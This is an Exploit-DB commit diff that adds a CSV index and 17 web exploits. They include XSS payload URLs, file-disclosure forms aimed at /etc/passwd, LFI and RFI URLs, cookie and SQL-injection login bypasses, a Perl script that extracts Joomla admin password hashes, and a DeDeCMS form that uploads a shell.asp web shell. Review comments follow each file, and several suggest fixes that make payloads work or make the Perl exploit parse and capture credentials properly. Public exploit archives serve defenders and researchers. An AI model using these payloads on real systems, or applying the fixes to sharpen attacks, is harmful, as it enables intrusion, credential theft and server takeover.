Updated 06_10_2014

This commit is contained in:
Offensive Security 2014-06-10 04:38:25 +00:00
parent 32619a65bd
commit f8588487ce
18 changed files with 297 additions and 0 deletions


@ -30335,3 +30335,20 @@ id,file,description,date,author,platform,type,port
33663,platforms/multiple/remote/33663.txt,"IBM WebSphere Portal 6.0.1.5 Build wp6015 Portlet Palette Search HTML Injection Vulnerability",2010-02-19,"Sjoerd Resink",multiple,remote,0
33664,platforms/multiple/remote/33664.html,"Mozilla Firefox <= 3.5.8 Style Sheet Redirection Information Disclosure Vulnerability",2010-01-09,"Cesar Cerrudo",multiple,remote,0
33665,platforms/php/webapps/33665.txt,"Softbiz Jobs 'sbad_type' Parameter Cross Site Scripting Vulnerability",2010-02-23,"pratul agrawal",php,webapps,0
33667,platforms/php/webapps/33667.txt,"Wordpress Theme Elegance - Post Local File Disclosure",2014-06-08,"felipe andrian",php,webapps,0
33668,platforms/php/webapps/33668.txt,"Wordpress Theme Infocus - Post Local File Disclosure",2014-06-08,"felipe andrian",php,webapps,0
33671,platforms/php/webapps/33671.txt,"MySmartBB 1.7 Multiple Cross Site Scripting Vulnerabilities",2010-02-24,indoushka,php,webapps,0
33673,platforms/php/webapps/33673.pl,"HD FLV Player Component for Joomla! 'id' Parameter SQL Injection Vulnerability",2010-02-24,kaMtiEz,php,webapps,0
33674,platforms/php/webapps/33674.txt,"OpenInferno OI.Blogs 1.0 Multiple Local File Include Vulnerabilities",2010-02-24,JIKO,php,webapps,0
33675,platforms/jsp/webapps/33675.txt,"Multiple IBM Products Login Page Cross Site Scripting Vulnerability",2010-02-25,"Oren Hafif",jsp,webapps,0
33676,platforms/php/webapps/33676.txt,"Newbie CMS 0.0.2 Insecure Cookie Authentication Bypass Vulnerability",2010-02-25,JIKO,php,webapps,0
33678,platforms/jsp/webapps/33678.txt,"ARISg 5.0 'wflogin.jsp' Cross Site Scripting Vulnerability",2010-02-26,"Yaniv Miron",jsp,webapps,0
33679,platforms/php/webapps/33679.txt,"TRUC 0.11 'login_reset_password_page.php' Cross Site Scripting Vulnerability",2010-02-28,snakespc,php,webapps,0
33680,platforms/php/webapps/33680.txt,"Open Educational System 0.1 beta 'CONF_INCLUDE_PATH' Parameter Multiple Remote File Include Vulnerabilities",2010-02-28,"cr4wl3r ",php,webapps,0
33681,platforms/php/webapps/33681.txt,"SLAED CMS 4 Installation Script Unauthorized Access Vulnerability",2010-02-27,indoushka,php,webapps,0
33682,platforms/multiple/remote/33682.txt,"Oracle Siebel 7.7/7.8 'loyalty_enu/start.swe' Cross Site Scripting Vulnerability",2010-03-01,Lament,multiple,remote,0
33683,platforms/php/webapps/33683.txt,"Article Friendly 'filename' Parameter Local File Include Vulnerability",2010-03-01,"pratul agrawal",php,webapps,0
33684,platforms/php/webapps/33684.txt,"Blax Blog 0.1 'girisyap.php' SQL Injection Vulnerability",2010-03-01,"cr4wl3r ",php,webapps,0
33685,platforms/php/webapps/33685.html,"DeDeCMS 5.5 '_SESSION[dede_admin_id]' Parameter Authentication Bypass Vulnerability",2010-03-01,"Wolves Security Team",php,webapps,0
33686,platforms/multiple/remote/33686.txt,"IBM Lotus Domino 7.0.2 'readme.nsf' Cross Site Scripting Vulnerability",2010-03-02,"Nahuel Grisolia",multiple,remote,0
33687,platforms/java/webapps/33687.txt,"Sparta Systems TrackWise EQMS Multiple Cross-Site Scripting Vulnerabilities",2010-03-02,"Yaniv Miron",java,webapps,0
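Review bot: the hunk header says 20 rows are added (`+30335,20`), but the commit touches 18 files (files.csv plus 17 exploit files), so three of the referenced paths are not added here; the rows for 33663, 33664 and 33665 are the ones with no corresponding file in this commit, so check that `platforms/multiple/remote/33663.txt`, `33664.html` and `platforms/php/webapps/33665.txt` already exist before the CSV points at them. The ID sequence also skips 33666, 33669, 33670, 33672 and 33677 without comment. Two author fields carry a trailing space (`"cr4wl3r "` on the 33680 and 33684 rows), which will make that author sort and group separately from an unpadded `cr4wl3r`; trim it. The 33667 and 33668 rows are dated 2014-06-08 while the files themselves say 07/06/2014; settle on one date and one format.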

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/38483/info
Sparta Systems TrackWise EQMS is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/[TrackWiseDir]/servlet/TeamAccess/Login/"><script>alert(&#039;XSS-By-Lament&#039;)</script>
http://www.example.com/[TrackWiseDir]/servlet/TeamAccess/BatchEditProgress.html/"><script>alert(&#039;XSS-By-Lament&#039;)</script>
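Review bot: both PoC URLs carry the apostrophes as `&#039;`, which is HTML-entity residue from the SecurityFocus page, not part of the payload. Inside a `<script>` element entity references are not decoded, so `alert(&#039;XSS-By-Lament&#039;)` is a JavaScript syntax error and the PoC as written will not fire; replace `&#039;` with a literal `'` (or `%27`) so the file can be used verbatim. It is also worth one sentence stating that the injection point is the path segment after `/Login/` and `/BatchEditProgress.html/`, not a named parameter, since that is where a fix has to go.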

platforms/jsp/webapps/33675.txt Executable file

@ -0,0 +1,13 @@
source: http://www.securityfocus.com/bid/38412/info
Multiple IBM products are prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
This issue affects IBM Lotus Web Content Management, WebSphere Portal, and Lotus Quickr.
http://www.example.com/wps/wcm/webinterface/login/login.jsp?";><script>maliciou s_script</script><b%20"
http://www.example.com/wps/wcm/webinterface/login/login.jsp?"; style="tr:expression(malicious_script)
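Review bot: `maliciou s_script` on the first PoC line has a stray space that breaks the payload; it should read `malicious_script`. The description's subject does not agree with its verb ("Multiple IBM products are prone ... because it fails"), and no release of Lotus Web Content Management, WebSphere Portal or Lotus Quickr is named, so a reader cannot tell which versions to check; add them. The second vector relies on a CSS `expression()` in a `style` attribute, which only executes in older Internet Explorer, and the file should say so rather than present it as a general-purpose variant. Separately, this .txt advisory is committed as an executable file, as are the other .txt files in the commit; plain-text files should not carry the execute bit.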


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/38441/info
ARISg is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
ARISg 5.0 is vulnerable; other versions may also be affected.
http://www.example.com/Aris/wflogin.jsp?errmsg=XSS msg<script>alert('Test XSS')</script>
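Review bot: the `errmsg` payload contains a literal space and raw `<`, `>` and `'`; it works when typed into a browser's location bar because the browser encodes it, but it will not reproduce from curl or a scanner unencoded. Either URL-encode the value or say that browser encoding is assumed. The only version statement is "ARISg 5.0 is vulnerable; other versions may also be affected", with no fix or vendor reference beyond the BID link; add one if it exists.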


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/38456/info
Oracle Siebel is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Oracle Siebel 7.7 and 7.8 are vulnerable; other versions may also be affected.
http://www.example.com/htim_enu/start.swe/?>'"><script>alert('XSS by Lament')</script>
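Review bot: the CSV row for 33682 names the affected script as `loyalty_enu/start.swe`, but the PoC here targets `htim_enu/start.swe`. Either the title or the PoC is wrong, or both application paths are affected; reconcile them. In Siebel each `<application>_enu` virtual directory exposes the same `start.swe` entry point, so the second reading is plausible, but if that is the intent the file should say the issue is in the shared SWE front end and list the paths that were verified rather than leaving the two records disagreeing.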


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/38481/info
IBM Lotus Domino is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
Lotus Domino 7.0.2 is vulnerable; other versions may also be affected.
http://www.example.com/help/readme.nsf/Header?OpenPage=&BaseTarget=%22;//%20--%3E%3C/script%3E%3Cscript%3Ealert%28%27XSS%27%29;%3C/script%3E
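Review bot: decoded, the payload is `";// --></script><script>alert('XSS');</script>`, which means `BaseTarget` is reflected inside an inline script block and the PoC has to terminate the string, comment out the rest of the line and close the block before it can open its own. The description only says the application "fails to properly sanitize user-supplied input"; state the injection context so a reader understands why the `";//` prefix and the `</script>` are required and does not strip them as noise. The vulnerable page lives in the `readme.nsf` help database under `/help/`; say whether removing or ACL-restricting that database is an acceptable workaround, since that is the first thing an administrator will ask.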

platforms/php/webapps/33667.txt Executable file

@ -0,0 +1,24 @@
[+] Post Local File Disclosure in wordpress theme Elegance
[+] Date: 07/06/2014
[+] CWE Number: CWE-98
[+] Risk: High
[+] Author: Felipe Andrian Peixoto
[+] Dork:inurl:"/wp-content/themes/elegance/"
[+] Vendor Homepage: http://www.elegantthemes.com/
[+] Contact: felipe_andrian@hotmail.com
[+] Tested on: Windows 7 and Linux
[+] Vulnerable File: dl-skin.php
[+] Exploit :
<html>
<body>
<form action="http://www.site.com/wp-content/themes/elegance/lib/scripts/dl-skin.php" method="post">
Download:<input type="text" name="_mysite_download_skin" value="/etc/passwd"><br>
<input type="submit">
</form>
</body>
</html>
eof
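Review bot: `CWE Number: CWE-98` does not describe what the PoC shows. CWE-98 is PHP remote file inclusion (improper control of a filename passed to include/require); a POST to `dl-skin.php` whose `_mysite_download_skin` value of `/etc/passwd` comes back as a download is an arbitrary file read through an externally controlled file name (CWE-22 or CWE-73), which is also what the title, "Post Local File Disclosure", says. The header date `07/06/2014` disagrees with `2014-06-08` in the CSV row. The HTML form is the whole PoC; add one sentence saying that the value appears to be an absolute path that the script returns as a file download, so a reader knows what a successful result looks like and can judge the "Risk: High" rating against what the web server account can read.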

platforms/php/webapps/33668.txt Executable file

@ -0,0 +1,32 @@
[+] Post Local File Disclosure in wordpress theme Infocus
[+] Date: 07/06/2014
[+] CWE Number: CWE-98
[+] Risk: High
[+] Author: Felipe Andrian Peixoto
[+] Dork:inurl:"/wp-content/themes/infocus/"
[+] Vendor Homepage: http://themeforest.net/item/infocus-powerful-professional-wordpress-theme/85486
[+] Contact: felipe_andrian@hotmail.com
[+] Tested on: Windows 7 and Linux
[+] Vulnerable File: dl-skin.php
[+] Exploit :
<html>
<body>
<form action="http://www.site.com/wp-content/themes/infocus/lib/scripts/dl-skin.php" method="post">
Download:<input type="text" name="_mysite_download_skin" value="/etc/passwd"><br>
<input type="submit">
</form>
</body>
</html>
eof
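Review bot: this is the same script path (`lib/scripts/dl-skin.php`), the same parameter (`_mysite_download_skin`) and the same payload as 33667; the two themes appear to bundle one shared library, so the root cause is a common component rather than two independent bugs. Cross-reference 33667 here and say whether any theme shipping `lib/scripts/dl-skin.php` is affected, instead of filing one entry per theme with identical text. The CWE-98 label is wrong for an arbitrary file read for the same reason as in 33667, and the `07/06/2014` header date again disagrees with the `2014-06-08` CSV date.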

platforms/php/webapps/33671.txt Executable file

@ -0,0 +1,15 @@
source: http://www.securityfocus.com/bid/38385/info
MySmartBB is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
The issues affect MySmartBB 1.7.0; other versions may also be affected.
http://www.example.com/MySBB/misc.php/>'><ScRiPt>alert(469588561854)</ScRiPt>
http://www.example.com/MySBB/index.php/>'><ScRiPt>alert(213771818860)</ScRiPt>
http://www.example.com/memberlist.php/>'><ScRiPt>alert(213771818860)</ScRiPt>
http://www.example.com/MySBB/new.php/>'><ScRiPt>alert(213771818860)</ScRiPt>
http://www.example.com/MySBB/pm.php/>'><ScRiPt>alert(213771818860)</ScRiPt>
http://www.example.com/MySBB/register.php/>'><ScRiPt>alert(213771818860)</ScRiPt>
http://www.example.com/MySBB/search.php/>'><ScRiPt>alert(213771818860)</ScRiPt>
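Review bot: the `memberlist.php` URL is the only one of the seven without the `/MySBB/` prefix; confirm whether that is a copy error or the script really sits at the web root. All payloads are injected as extra path info (`misc.php/>'><ScRiPt>...`), not through a named parameter, so what is reflected is the request URI itself, most likely via an unescaped `PHP_SELF` or `REQUEST_URI` in a shared header or footer, which would also explain why seven unrelated scripts are listed. The description should say that, because it moves the fix from individual parameters to the one place the script echoes its own URL.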

platforms/php/webapps/33673.pl Executable file

@ -0,0 +1,68 @@
source: http://www.securityfocus.com/bid/38401/info
The HD FLV Player component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
#!/usr/bin/perl -w
###############################################################################################
#
# [~] Joomla Component com_hdflvplayer SQL injection exploit - (id)
# [~] Author : kaMtiEz (kamzcrew@yahoo.com)
# [~] Homepage : http://www.indonesiancoder.com
# [~] Date : 15 February, 2010
#
###############################################################################################
#
# [ Software Information ]
#
# [+] Vendor : http://www.hdflvplayer.net/
# [+] Price : $ 99.00
# [+] Vulnerability : SQL injection
# [+] Dork : inurl:"CIHUY"
# [+] Type : commercial
#
###############################################################################################
#
# USAGE : perl kaMz.pl
#
###############################################################################################
print "\t\t[!]=========================================================[!]\n\n";
print "\t\t [~] INDONESIANCODER TEAM [~] \n\n";
print "\t\t[!]=========================================================[!]\n\n";
print "\t\t [!]Joomla component com_hdflvplayer SQL injection exploit[!] \n\n";
print "\t\t [~] by kaMtiEz [~] \n\n";
print "\t\t[!]=========================================================[!]\n\n";
use LWP::UserAgent;
print "\nsite/path[!]http://www.indonesiancoder.com/kaMz/[!]:";
chomp(my $IBL13Z=<STDIN>);
$kaMtiEz="concat(username,0x3a,password)";
$tukulesto="jos_users";
$pathloader="com_hdflvplayer";
$r3m1ck = LWP::UserAgent->new() or die "Could not initialize browser\n";
$r3m1ck->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$arianom = $IBL13Z . "/index.php?option=".$pathloader."&id=1+AND+1=2+UNION+SELECT+".$kaMtiEz.",1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+".$tukulesto."--";
$gonzhack = $r3m1ck->request(HTTP::Request->new(GET=>$arianom));
$contrex = $gonzhack->content; if ($contrex =~/([0-9a-fA-F]{32})/){
print "\n[+] CIHUY Admin Password Nya GAN [+]: $1\n\n";
}
else{print "\n[+] Exploit GAGAL GAN ![+]\n";
}
##############################################################################################
#
# GREETZZZZZ :
#
# INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW MainHack ServerIsDown SurabayaHackerLink IndonesianHacker SoldierOfAllah
# tukulesto,M3NW5,arianom,tiw0L,abah_benu,d0ntcry,newbie_043,bobyhikaru,gonzhack
# Contrex,onthel,yasea,bugs,Ronz,Pathloader,cimpli,MarahMerah,ibl13z,r3m1ck
# Coracore,Gh4mb4s,Jack-,VycOd,m0rgue a.k.a mbamboenk
#
##############################################################################################
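Review bot: the file is `33673.pl`, but the three SecurityFocus description lines sit above `#!/usr/bin/perl -w` as uncommented prose, so `perl 33673.pl` fails with a syntax error before the shebang is ever reached; prefix them with `#` or move them below the header comment block. In the script itself, `$contrex =~ /([0-9a-fA-F]{32})/` captures the first 32-hex string anywhere in the response, so any MD5 on the page is reported as the admin hash, and the username and the `0x3a` separator that `concat(username,0x3a,password)` deliberately injects are discarded because only `$1` is printed; match on the `username:hash` pair the query produces. There is no check of `$gonzhack->is_success`, so an HTTP error prints `Exploit GAGAL GAN` and is indistinguishable from an unexploitable target, and the hard-coded `1,2,...,18` column list means the script only works when the vulnerable query selects exactly 19 columns. `Dork : inurl:"CIHUY"` is a placeholder, not a usable search term; drop it or replace it.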

platforms/php/webapps/33674.txt Executable file

@ -0,0 +1,16 @@
source: http://www.securityfocus.com/bid/38402/info
OpenInferno OI.Blogs is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker can exploit these vulnerabilities to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
OpenInferno OI.Blogs 1.0.0 is vulnerable; other versions may also be affected.
The following example URIs are available:
http://www.example.com/templates/loadStyles.php?theme=file%00
http://www.example.com/sources/javascript/loadScripts.php?scripts=[file]%00
The following example data is available:
javascript:document.cookie="installerFile=[FIle];path='/upload/admin/plugins'
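Review bot: the third vector, `javascript:document.cookie="installerFile=[FIle];path='/upload/admin/plugins'`, has unbalanced quotes (the `"` opened after `cookie=` is never closed and the path is wrapped in `'`), so it cannot be pasted into a location bar as written; it should read `document.cookie="installerFile=[file];path=/upload/admin/plugins"`, and `[FIle]` is a typo. It is also a third include sink (cookie-controlled, not a GET parameter), and the text should say so rather than listing it as "example data" under the two URIs. Both `%00` URIs depend on null-byte truncation of the include path, which PHP rejects from 5.3.4 onward; record the PHP version the PoC was tested against.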

platforms/php/webapps/33676.txt Executable file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/38421/info
Newbie CMS is prone to an authentication-bypass vulnerability because it fails to adequately verify user-supplied input used for cookie-based authentication.
Attackers can exploit this vulnerability to gain administrative access to the affected application, which may aid in further attacks.
Versions prior to Newbie CMS 0.03 are vulnerable; other versions may also be affected.
Supplying the following cookie data is sufficient to exploit this issue:
javascript:document.cookie="nb_logged=jiko;path=/newbb/admin/";
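Review bot: "Versions prior to Newbie CMS 0.03 are vulnerable" does not match the CSV title `Newbie CMS 0.0.2`; use one version notation in both places. The cookie `nb_logged=jiko` is given with no explanation of whether the value matters; if the application only checks that the cookie exists, which is what "fails to adequately verify user-supplied input" suggests, say so explicitly, and note that `path=/newbb/admin/` must match the actual install path. The `javascript:` prefix is a location-bar idiom; a plain `Cookie: nb_logged=jiko` request header works from any client and is the clearer way to document it.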

platforms/php/webapps/33679.txt Executable file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/38445/info
TRUC is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
TRUC 0.11.0 is vulnerable; other versions may also be affected.
http://www.example.com/truc/login_reset_password_page.php?failed=true&error="><script>alert(document.cookie);</script>
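Review bot: the leading `">` in the `error` payload shows the value is reflected inside a double-quoted attribute; state that, and say whether `failed=true` is required for `error` to be rendered at all, since the PoC includes it without comment and a reader trimming the URL will otherwise get a false negative. The file says `TRUC 0.11.0` while the CSV title says `0.11`; pick one.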

platforms/php/webapps/33680.txt Executable file

@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/38449/info
Open Educational System is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the computer; other attacks are also possible.
Open Educational System 0.1 beta and prior versions are vulnerable.
http://www.example.com/[path]/admin/modules/modules/forum/admin.php?CONF_INCLUDE_PATH=attacker's site
http://www.example.com/[path]/admin/modules/modules/plotgraph/index.php?CONF_INCLUDE_PATH=attacker's site
http://www.example.com/[path]/admin/modules/user_account/admin_user/mod_admuser.php?CONF_INCLUDE_PATH=attacker's site
http://www.example.com/[path]/admin/modules/user_account/ogroup/mod_group.php?CONF_INCLUDE_PATH=attacker's site
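Review bot: `CONF_INCLUDE_PATH=attacker's site` is a prose placeholder embedded in a URL; use the bracket convention the same lines already use for `[path]`, e.g. `CONF_INCLUDE_PATH=[remote URL]`, so it is not read as a literal. Remote inclusion through `include()` of an `http://` URL needs `allow_url_include=On`, which has been off by default since PHP 5.2, and if the value is used as a path prefix, as the parameter name suggests, the remainder of the include path must also resolve on the attacker's server; both preconditions belong in the advisory. Also confirm that the doubled `admin/modules/modules/` segment in the first two URIs is the real directory layout and not a copy error, since the other two URIs use `admin/modules/user_account/`.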

platforms/php/webapps/33681.txt Executable file

@ -0,0 +1,13 @@
source: http://www.securityfocus.com/bid/38453/info
SLAED CMS is prone to an unauthorized-access vulnerability.
Attackers can exploit this issue to obtain unauthorized access to installation scripts.
SLAED CMS 4 is vulnerable; other versions may also be affected.
The following example URIs are available:
http://www.example.com/sd/setup.php?op=language&lang=1
http://www.example.com/sd/install/index.php?op=language&lang=1
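Review bot: the description stops at "unauthorized access to installation scripts" and neither URI shows what an attacker gains; `op=language&lang=1` is only a language switch. State that the installer is reachable after installation without authentication and what the next step is (re-running setup, rewriting the configuration, creating an administrator), otherwise the entry reads as an information item rather than a vulnerability. The two paths, `/sd/setup.php` and `/sd/install/index.php`, look like two separate leftover installers; confirm both were verified and which one the BID refers to.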


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/38461/info
Article Friendly is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the underlying computer; other attacks are also possible.
Article Friendly Pro is vulnerable; other versions may also be affected.
http://www.example.com/admin/index.php?filename=../../../../../../../../../../etc/passwd%00
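Review bot: "Article Friendly Pro is vulnerable" here versus `Article Friendly` in the CSV title; align the product name. The PoC hits `/admin/index.php`, and nothing says whether the `filename` include is reachable before admin authentication, which decides whether this is a pre-auth or post-auth LFI. The `%00` terminator depends on null-byte truncation, which PHP rejects from 5.3.4 onward, so either record the tested PHP version or note that the traversal still works unmodified when the parameter is used as the complete path with nothing appended.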

platforms/php/webapps/33684.txt Executable file

@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/38465/info
Blax Blog is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Blax Blog 0.1 is vulnerable; other versions may also be affected.
http://www.example.com/admin/girisyap.php
Username: ' or '1=1
password: ' or '1=1
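Review bot: submitting `' or '1=1` in both fields presumably turns the login query into `... WHERE user='' or '1=1' AND pass='' or '1=1'`, where `'1=1'` is a string, not a comparison; it is truthy only because MySQL coerces the leading `1` to a number, and it fails on databases that do not. The portable form is `' or '1'='1`; use it, or state that MySQL is assumed. The description speaks only of access to or modification of data, but the PoC is a login bypass on `girisyap.php`; say which account the bypass lands in (typically the first row, the administrator) so the impact is clear.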


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/38469/info
DeDeCMS is prone to an authentication-bypass vulnerability because it fails to adequately verify user-supplied input.
Attackers can exploit this issue to gain unauthorized access to the affected application.
DeDeCMS GBK 5.5 is vulnerable; other versions may also be affected.
<form action="" method='POST' enctype="multipart/form-data"> U&nbsp;R&nbsp;L:<input type="text" name="target" size="50" value="http://192.168.1.110">&nbsp;&nbsp; Path:<input type="text" name="path" value="/DedeCmsV55-GBK-Final/uploads/include/dialog/select_soft_post.php" size="90"><br> File:&nbsp;<input type='file' name='uploadfile' size='25' />(Filetype must be GIF/JPEG etc)&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; RenameTo:<input type='test' name='newname' value="shell.asp."/><br> &nbsp; <input type=hidden name="_SESSION[dede_admin_id]" value=1> <input type=hidden name="bkurl" value=1> <input type='button' value='submit' onclick="fsubmit()"/><br><br><br><br><br><br> dedecms 0day exp..<br> need: session.auto_start = 1<br> By toby57 2010/2/22 </form> <script> function fsubmit(){ var form = document.forms[0]; form.action = form.target.value + form.path.value; tmpstr = form.target.value +'/'+ form.newname.value; form.bkurl.value = tmpstr.substr(0,tmpstr.length-1); form.submit(); } </script>
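Review bot: the entry is filed as an authentication bypass, but what the form does is an arbitrary file upload: it posts `_SESSION[dede_admin_id]=1` as a request field to `include/dialog/select_soft_post.php` together with an image renamed to `shell.asp.`, and the script trims the trailing dot when building `bkurl` (`tmpstr.substr(0,tmpstr.length-1)`), so the trailing dot is the Windows filename trick for landing `shell.asp`. The title and description should say "Authentication Bypass / Arbitrary File Upload", and the `session.auto_start = 1` precondition that the form itself states should be explained, since the whole PoC depends on the `_SESSION[dede_admin_id]` request field being honoured. The form is committed as a single line and should be reflowed; `type='test'` on the `newname` input is a typo for `type='text'`, and the commentary (`dedecms 0day exp..`, `need: session.auto_start = 1`, `By toby57 2010/2/22`) belongs outside the `<form>`. Credit is given to toby57 in the form while the CSV row credits "Wolves Security Team"; keep both in the file header.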